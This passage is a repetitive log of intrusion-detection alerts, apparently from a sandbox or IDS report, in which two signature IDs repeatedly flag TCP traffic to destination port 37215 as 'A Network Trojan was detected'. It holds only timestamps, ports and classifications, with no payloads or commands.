          Timestamp:05/28/24-14:47:30.464033
          SID:2829579
          Source Port:38762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145306
          SID:2829579
          Source Port:39054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229905
          SID:2829579
          Source Port:38780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219627
          SID:2835222
          Source Port:41778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115552
          SID:2835222
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270346
          SID:2829579
          Source Port:48576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659931
          SID:2835222
          Source Port:45860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553318
          SID:2835222
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187383
          SID:2829579
          Source Port:50156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227890
          SID:2835222
          Source Port:59356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626433
          SID:2835222
          Source Port:46512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594973
          SID:2829579
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051287
          SID:2835222
          Source Port:51836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510326
          SID:2835222
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756822
          SID:2835222
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485459
          SID:2835222
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858879
          SID:2835222
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441321
          SID:2829579
          Source Port:52250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475714
          SID:2829579
          Source Port:48550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845474
          SID:2835222
          Source Port:45108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665393
          SID:2829579
          Source Port:57538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939537
          SID:2829579
          Source Port:33172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204558
          SID:2829579
          Source Port:51012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551095
          SID:2835222
          Source Port:51008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547966
          SID:2835222
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401045
          SID:2829579
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734421
          SID:2829579
          Source Port:44038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890073
          SID:2835222
          Source Port:51996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062863
          SID:2835222
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196044
          SID:2835222
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535485
          SID:2835222
          Source Port:56264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273196
          SID:2835222
          Source Port:53608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843403
          SID:2829579
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822586
          SID:2835222
          Source Port:35822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299535
          SID:2835222
          Source Port:34282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964195
          SID:2835222
          Source Port:45804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808878
          SID:2835222
          Source Port:35854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215986
          SID:2829579
          Source Port:44928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157045
          SID:2835222
          Source Port:36530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207109
          SID:2829579
          Source Port:58802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840480
          SID:2829579
          Source Port:59618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949719
          SID:2835222
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269338
          SID:2835222
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291556
          SID:2835222
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.332919
          SID:2829579
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140260
          SID:2835222
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.306222
          SID:2835222
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188198
          SID:2835222
          Source Port:47182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532923
          SID:2829579
          Source Port:42068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659557
          SID:2829579
          Source Port:60362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961608
          SID:2835222
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886175
          SID:2829579
          Source Port:48784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998746
          SID:2829579
          Source Port:57902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604334
          SID:2835222
          Source Port:60470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411924
          SID:2829579
          Source Port:42182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.533125
          SID:2835222
          Source Port:46322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471079
          SID:2835222
          Source Port:39322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283484
          SID:2829579
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923548
          SID:2835222
          Source Port:50492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711482
          SID:2829579
          Source Port:37280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846341
          SID:2829579
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156836
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486409
          SID:2829579
          Source Port:46616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474932
          SID:2829579
          Source Port:57274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352484
          SID:2835222
          Source Port:34018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195568
          SID:2829579
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062023
          SID:2835222
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301285
          SID:2829579
          Source Port:55574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.295039
          SID:2835222
          Source Port:54346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669309
          SID:2835222
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291663
          SID:2835222
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477871
          SID:2835222
          Source Port:43944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530158
          SID:2829579
          Source Port:57366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153026
          SID:2829579
          Source Port:33880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711274
          SID:2835222
          Source Port:41476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733176
          SID:2835222
          Source Port:54766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020474
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756526
          SID:2835222
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062377
          SID:2835222
          Source Port:57136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711323
          SID:2829579
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927782
          SID:2835222
          Source Port:59284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144924
          SID:2829579
          Source Port:41682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269294
          SID:2829579
          Source Port:57342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466262
          SID:2835222
          Source Port:43190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205636
          SID:2835222
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669491
          SID:2829579
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305466
          SID:2835222
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299302
          SID:2829579
          Source Port:59228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772128
          SID:2829579
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979324
          SID:2835222
          Source Port:44698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462992
          SID:2829579
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544106
          SID:2829579
          Source Port:59630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322403
          SID:2829579
          Source Port:43914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322824
          SID:2835222
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679755
          SID:2829579
          Source Port:58478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921069
          SID:2835222
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162228
          SID:2829579
          Source Port:42302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178925
          SID:2835222
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225669
          SID:2835222
          Source Port:37984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712107
          SID:2835222
          Source Port:48650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272794
          SID:2829579
          Source Port:33518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764355
          SID:2835222
          Source Port:34902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305149
          SID:2829579
          Source Port:53402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876923
          SID:2829579
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298607
          SID:2835222
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298252
          SID:2829579
          Source Port:48362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778589
          SID:2835222
          Source Port:39082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231713
          SID:2829579
          Source Port:58872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557243
          SID:2829579
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481148
          SID:2835222
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.035426
          SID:2829579
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157024
          SID:2829579
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547532
          SID:2835222
          Source Port:48922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046767
          SID:2829579
          Source Port:42692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168580
          SID:2829579
          Source Port:36778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.765455
          SID:2835222
          Source Port:41698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291508
          SID:2829579
          Source Port:57766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794124
          SID:2835222
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116807
          SID:2835222
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298825
          SID:2835222
          Source Port:40784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293129
          SID:2829579
          Source Port:36876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497659
          SID:2829579
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422460
          SID:2835222
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157547
          SID:2829579
          Source Port:55624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974908
          SID:2829579
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.702619
          SID:2835222
          Source Port:36756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488637
          SID:2835222
          Source Port:33618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175804
          SID:2829579
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671973
          SID:2835222
          Source Port:50080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399835
          SID:2835222
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721925
          SID:2835222
          Source Port:45074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599067
          SID:2829579
          Source Port:37022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977415
          SID:2829579
          Source Port:35434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156501
          SID:2835222
          Source Port:42050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271285
          SID:2835222
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476466
          SID:2829579
          Source Port:42218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537419
          SID:2835222
          Source Port:50334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620291
          SID:2829579
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160060
          SID:2829579
          Source Port:58794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741645
          SID:2835222
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328558
          SID:2829579
          Source Port:37386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635096
          SID:2829579
          Source Port:46848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594852
          SID:2829579
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230286
          SID:2829579
          Source Port:33358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338011
          SID:2835222
          Source Port:34970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879158
          SID:2835222
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472706
          SID:2829579
          Source Port:55076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707659
          SID:2835222
          Source Port:58878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907583
          SID:2829579
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782417
          SID:2835222
          Source Port:52972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298309
          SID:2835222
          Source Port:59444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848309
          SID:2829579
          Source Port:53414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249385
          SID:2829579
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551117
          SID:2835222
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560461
          SID:2835222
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597142
          SID:2835222
          Source Port:56452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041394
          SID:2829579
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145297
          SID:2835222
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977558
          SID:2829579
          Source Port:40294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629732
          SID:2829579
          Source Port:60342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891436
          SID:2829579
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847523
          SID:2835222
          Source Port:54592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060252
          SID:2835222
          Source Port:44878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482608
          SID:2829579
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623921
          SID:2829579
          Source Port:39828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877881
          SID:2835222
          Source Port:46818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273161
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878844
          SID:2829579
          Source Port:42798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946678
          SID:2829579
          Source Port:50918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281657
          SID:2829579
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270271
          SID:2829579
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811192
          SID:2835222
          Source Port:45262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907903
          SID:2835222
          Source Port:50372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195452
          SID:2829579
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196252
          SID:2835222
          Source Port:34948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530256
          SID:2829579
          Source Port:44648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.719111
          SID:2835222
          Source Port:47168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922690
          SID:2829579
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042478
          SID:2829579
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326634
          SID:2829579
          Source Port:35128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373620
          SID:2829579
          Source Port:60724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144720
          SID:2829579
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745851
          SID:2835222
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888063
          SID:2835222
          Source Port:46608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985164
          SID:2835222
          Source Port:55474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770887
          SID:2829579
          Source Port:36364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190446
          SID:2829579
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287569
          SID:2829579
          Source Port:51392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2829579
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324600
          SID:2835222
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480115
          SID:2835222
          Source Port:49160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752166
          SID:2835222
          Source Port:53288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772712
          SID:2835222
          Source Port:36334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979175
          SID:2829579
          Source Port:44476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989052
          SID:2829579
          Source Port:34648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.374642
          SID:2835222
          Source Port:37996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681090
          SID:2829579
          Source Port:32822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542326
